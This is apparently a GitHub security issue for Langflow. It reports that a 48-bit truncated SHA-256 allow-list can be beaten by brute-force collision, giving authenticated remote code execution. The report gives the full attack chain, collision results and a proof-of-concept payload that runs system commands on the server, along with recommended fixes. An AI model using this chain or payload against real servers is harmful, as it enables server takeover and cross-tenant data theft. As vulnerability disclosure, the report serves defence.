Custom Component Allow-List Bypass → Authenticated RCE

### Bug Description

## Summary

The custom component code-execution allow-list uses a **48-bit truncated SHA-256** hash (`sha256(code)[:12]`) as its sole security gate. When `allow_custom_components=false` (the multi-tenant hardening setting), this gate is the only defense preventing authenticated users from executing arbitrary code on the server.

A 48-bit second-preimage is computationally feasible: we demonstrated a collision in **7.4 minutes** on commodity hardware (326-core CPU), producing malicious code that passes the gate and achieves server-side RCE via `exec()`.

## Affected Code

| File | Line | Function |
|------|------|----------|
| `src/lfx/src/lfx/utils/flow_validation.py` | 29 | `_compute_code_hash` |
| `src/lfx/src/lfx/custom/utils.py` | 67 | `_generate_code_hash` |

```python
# The vulnerable truncation (both files):
return hashlib.sha256(source_code.encode("utf-8")).hexdigest()[:12]  # 48-bit
```

## Root Cause

1. `_compute_code_hash(code)` truncates SHA-256 to 48 bits (12 hex chars)
2. The allow-list (`all_known_hashes`) stores these 48-bit values, computed from public built-in component source code
3. Gate check: `_compute_code_hash(submitted_code) in all_known_hashes`
4. **The submitted code that passes the check is the same code that gets `exec()`'d** (`validate.create_class` → `compile` → `exec`)

## Attack Chain

1. **Authenticate** as any user (any role) — `POST /api/v1/auto_login` or `/login`
2. **Fetch targets** — `GET /api/v1/all` returns all built-in component source code; compute their `sha256[:12]` (352 targets in current release)
3. **Brute-force** — Find a malicious code payload whose `sha256[:12]` matches any target (48-bit second-preimage against 352 targets: expected ~2^48/352 ≈ 8×10^11 hashes)
4. **Submit** — `POST /api/v1/custom_component` with `{"code": malicious_code}`
5. **Gate passes** — `code_hash_matches_any_template()` returns True
6. **RCE** — `Component(_code=code)` → `build_custom_component_template` → `eval_custom_component_code` → `validate.create_class` → `exec(compiled_code)` — module-level `ast.Assign` nodes execute immediately

## Proof of Concept

### Collision Found

```
nonce:      qsbr1kk8haaaaaaa
sha256[:12]: faa14b3d6a18 (matches built-in component hash)
sha256:     faa14b3d6a182f9007d1a998d057e87ce01d1eb8262d7a75a8ba057edf0fd916
attempts:   1,366,933,483,198
time:       446.16 seconds (7.4 minutes)
rate:       3,063.77 MH/s
hardware:   AMD EPYC 9654 (PowerEdge R7625), 326 threads
method:     SHA-256 midstate precomputation + partitioned deterministic search
```

### Malicious Code (collision_code_48bit.py)

```python
import subprocess, os
from langflow.custom import Component
from langflow.io import MessageTextInput, Output
from langflow.schema.message import Message

_rce_setup = [os.makedirs("/tmp/evidence", exist_ok=True)]
_rce_marker = open("/tmp/evidence/pwned.txt", "w")
_rce_marker.write("CTF{48bit_sha256_truncation_RCE}" + chr(10))
_rce_marker.write("uid=" + str(os.getuid()) + " pid=" + str(os.getpid()) + chr(10))
_rce_marker.write("whoami=" + subprocess.check_output(["whoami"]).decode().strip() + chr(10))
_rce_marker.write("hostname=" + subprocess.check_output(["hostname"]).decode().strip() + chr(10))
_rce_marker.close()

class PwnedComponent(Component):
    display_name = "Text Input"
    description = "Get user text inputs."
    icon = "type"
    name = "TextInput"

    inputs = [
        MessageTextInput(name="input_value", display_name="Text"),
    ]
    outputs = [
        Output(display_name="Message", name="message", method="text_response"),
    ]

    def text_response(self) -> Message:
        return Message(text=open("/tmp/evidence/pwned.txt").read())
# collision-nonce: qsbr1kk8haaaaaaa
```

### Why Module-Level Code Executes

`validate.create_class` uses AST parsing. `prepare_global_scope` collects and `exec()`s these AST node types from the submitted code:
- `ast.Import` / `ast.ImportFrom`
- `ast.Assign` / `ast.AnnAssign` ← **our RCE payload uses this**
- `ast.ClassDef` / `ast.FunctionDef`

The `_rce_setup = [...]` and `_rce_marker = open(...).write(...)` lines are `ast.Assign` nodes that execute during `prepare_global_scope` → `exec(definitions)`.

## Feasibility Analysis

| Hardware | Rate | Time (352 targets) |
|----------|------|-----|
| 1 CPU core (AMD EPYC) | ~10 MH/s | ~22 hours |
| 326 CPU cores | 3.06 GH/s | **7.4 minutes** |
| 1x RTX 4090 (estimated) | ~20 GH/s | ~40 seconds |
| 8x RTX 4090 (estimated) | ~160 GH/s | ~5 seconds |

NIST minimum security strength is 112 bits (SP 800-131A). The current 48-bit truncation is **64 bits below the minimum acceptable standard**, requiring only 2^48 work vs the mandated 2^112.

## Conditions

- `LANGFLOW_ALLOW_CUSTOM_COMPONENTS=false` must be set (the multi-tenant hardening mode; default is `true` = no gate at all)
- Attacker needs an authenticated account (any role)
- Target hashes are public (derived from open-source built-in component code)

## Recommended Fix

### Immediate (stop the truncation):

```python
# Before (48-bit, breakable):
return hashlib.sha256(source_code.encode("utf-8")).hexdigest()[:12]

# After (256-bit, meets NIST 128-bit security strength):
return hashlib.sha256(source_code.encode("utf-8")).hexdigest()
```

Apply to both `flow_validation.py:29` and `custom/utils.py:67`.

### Defense-in-depth (architectural):

1. **Don't exec client bytes** — When the gate passes, execute the **server's stored trusted copy** of the component, not the client-submitted code. This breaks the fundamental "checked bytes = exec'd bytes" equivalence.
2. **Sign the allow-list** — Use an HMAC with a server-side secret over `(component_type, code_hash)`, so offline precomputation is useless.
3. **Sandbox tenant code** — Execute components in an isolated container/VM regardless of whether they pass the allow-list.

## Files Provided

| File | Description |
|------|-------------|
| `collision_code_48bit.py` | The malicious code with verified 48-bit collision |
| `fast_bruteforce_v6.c` | Collision search tool (midstate + partitioned, C) |
| `target_hashes.txt` | 352 target hashes extracted from langflow |
| `code_prefix.txt` | Malicious template prefix |
| `exploit.py` | Full end-to-end exploit (recon → submit → verify) |
| `docker-compose.yml` | Reproducible target environment |


## Impact

## Impact

An authenticated attacker (any role, any privilege level) can execute **arbitrary code on the langflow server process** by bypassing the custom component allow-list. Concrete impact:

- **Full server compromise**: The malicious code runs in the langflow server process with its full privilege — read/write access to all files, environment variables (including API keys, database credentials, secrets), and network connectivity.
- **Cross-tenant data breach**: In multi-tenant deployments (the exact scenario `allow_custom_components=false` is designed to protect), the attacker can access all tenants' flows, credentials, uploaded documents, and conversation history stored in the shared database.
- **Lateral movement**: The server process typically has access to internal networks, databases (PostgreSQL), and external API keys (OpenAI, etc.), enabling further compromise beyond langflow itself.
- **Supply chain risk**: The attacker can silently modify built-in component code or inject backdoors into flows belonging to other users, persisting access even after the initial vulnerability is patched.
- **Denial of service**: Arbitrary code execution trivially enables process termination, resource exhaustion, or data destruction.

### Reproduction

as above 

### Expected behavior

above

### Who can help?

@italojohnny 

### Operating System

ubuntu 22.04

### Langflow Version

1.9,6

### Python Version

3.10

### Screenshot

_No response_

### Flow File

_No response_

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Custom Component Allow-List Bypass → Authenticated RCE #13496

Bug Description

Summary

Affected Code

Root Cause

Attack Chain

Proof of Concept

Collision Found

Malicious Code (collision_code_48bit.py)

Why Module-Level Code Executes

Feasibility Analysis

Conditions

Recommended Fix

Immediate (stop the truncation):

Defense-in-depth (architectural):

Files Provided

Impact

Impact

Reproduction

Expected behavior

Who can help?

Operating System

Langflow Version

Python Version

Screenshot

Flow File

Metadata

Assignees

Labels

Type

Fields

Projects

Milestone

Relationships

Development

File	Line	Function
`src/lfx/src/lfx/utils/flow_validation.py`	29	`_compute_code_hash`
`src/lfx/src/lfx/custom/utils.py`	67	`_generate_code_hash`

Hardware	Rate	Time (352 targets)
1 CPU core (AMD EPYC)	~10 MH/s	~22 hours
326 CPU cores	3.06 GH/s	7.4 minutes
1x RTX 4090 (estimated)	~20 GH/s	~40 seconds
8x RTX 4090 (estimated)	~160 GH/s	~5 seconds

File	Description
`collision_code_48bit.py`	The malicious code with verified 48-bit collision
`fast_bruteforce_v6.c`	Collision search tool (midstate + partitioned, C)
`target_hashes.txt`	352 target hashes extracted from langflow
`code_prefix.txt`	Malicious template prefix
`exploit.py`	Full end-to-end exploit (recon → submit → verify)
`docker-compose.yml`	Reproducible target environment

Custom Component Allow-List Bypass → Authenticated RCE #13496

Description

Bug Description

Summary

Affected Code

Root Cause

Attack Chain

Proof of Concept

Collision Found

Malicious Code (collision_code_48bit.py)

Why Module-Level Code Executes

Feasibility Analysis

Conditions

Recommended Fix

Immediate (stop the truncation):

Defense-in-depth (architectural):

Files Provided

Impact

Impact

Reproduction

Expected behavior

Who can help?

Operating System

Langflow Version

Python Version

Screenshot

Flow File

Metadata

Metadata

Assignees

Labels

Type

Fields

Projects

Milestone

Relationships

Development

Issue actions